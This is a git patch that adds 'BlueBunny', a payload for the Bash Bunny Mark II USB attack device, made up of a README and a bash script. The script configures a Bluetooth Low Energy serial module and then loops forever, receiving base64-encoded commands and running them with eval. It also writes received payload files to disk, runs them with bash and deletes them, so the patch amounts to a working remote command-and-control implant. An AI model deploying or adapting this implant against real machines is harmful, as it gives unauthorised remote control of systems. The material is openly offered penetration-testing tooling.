From 678359b7c73ee70d60a4f61e143789a023820eeb Mon Sep 17 00:00:00 2001
From: 90N45 <79598596+90N45-d3v@users.noreply.github.com>
Date: Tue, 31 Oct 2023 16:47:18 +0100
Subject: [PATCH] Add BlueBunny

Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
---
 .../library/remote_access/BlueBunny/README.md | 20 ++++++
 .../remote_access/BlueBunny/payload.txt       | 63 +++++++++++++++++++
 2 files changed, 83 insertions(+)
 create mode 100644 payloads/library/remote_access/BlueBunny/README.md
 create mode 100644 payloads/library/remote_access/BlueBunny/payload.txt

diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md
new file mode 100644
index 00000000..9df8124c
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/README.md
@@ -0,0 +1,20 @@
+# BlueBunny
+* Author: 90N45
+* Version: 1.0
+* Category: Remote
+* Attackmodes: NONE (Custom)
+
+### Description
+Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
+Send your Bash Bunny all the instructions it needs on-demand over the air.
+
+### Setup
+This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Configuring BLE |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |
+
+*Average runtime: 13 seconds*
\ No newline at end of file
diff --git a/payloads/library/remote_access/BlueBunny/payload.txt b/payloads/library/remote_access/BlueBunny/payload.txt
new file mode 100644
index 00000000..e5325aa1
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/payload.txt
@@ -0,0 +1,63 @@
+#!/bin/bash
+#
+# Title:         BlueBunny
+# Description:   BLE based C2 server for the Bash Bunny Mark II
+# Author:        90N45
+# Version:       1.0
+# Category:      Remote
+# Attackmodes:   NONE (Custom)
+
+LED SETUP
+
+# Enable serial BLE module
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+
+# Configure BLE module as slave
+echo -n -e "AT+ROLE=0" > /dev/ttyS1
+echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
+echo -n -e "AT+ADV=1" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+LED FINISH
+
+while [[ true ]]; do
+	# Get incomming data from serial port
+	data=$(head -1 /dev/ttyS1)
+
+	# Decode base64 encoded data
+	data=$(echo ${data} | base64 -d)
+
+	# Echo data for debugging
+	echo "Debugger: ${data}"
+
+	# Single command
+	if [[ $data =~ "<CMD>" ]]; then
+		# Extract command
+		command=${data#*<CMD>}
+		command=${command%%<CMD>*}
+
+		# Run recieved command
+		eval "${command}"
+	fi
+
+	# Payload file
+	if [[ $data =~ "<PAYLOAD>" ]]; then
+		# Set payload file name
+		file="BlueBunnyPayload-${RANDOM}.txt"
+
+		# Extract file content
+		content=${data#*<PAYLOAD>}
+		content=${content%%<PAYLOAD>*}
+
+		# Write content to file
+		printf "${content}" > "${file}";
+
+		# Run payload
+		bash $file
+
+		# Remove payload file
+		rm $file
+	fi
+done
\ No newline at end of file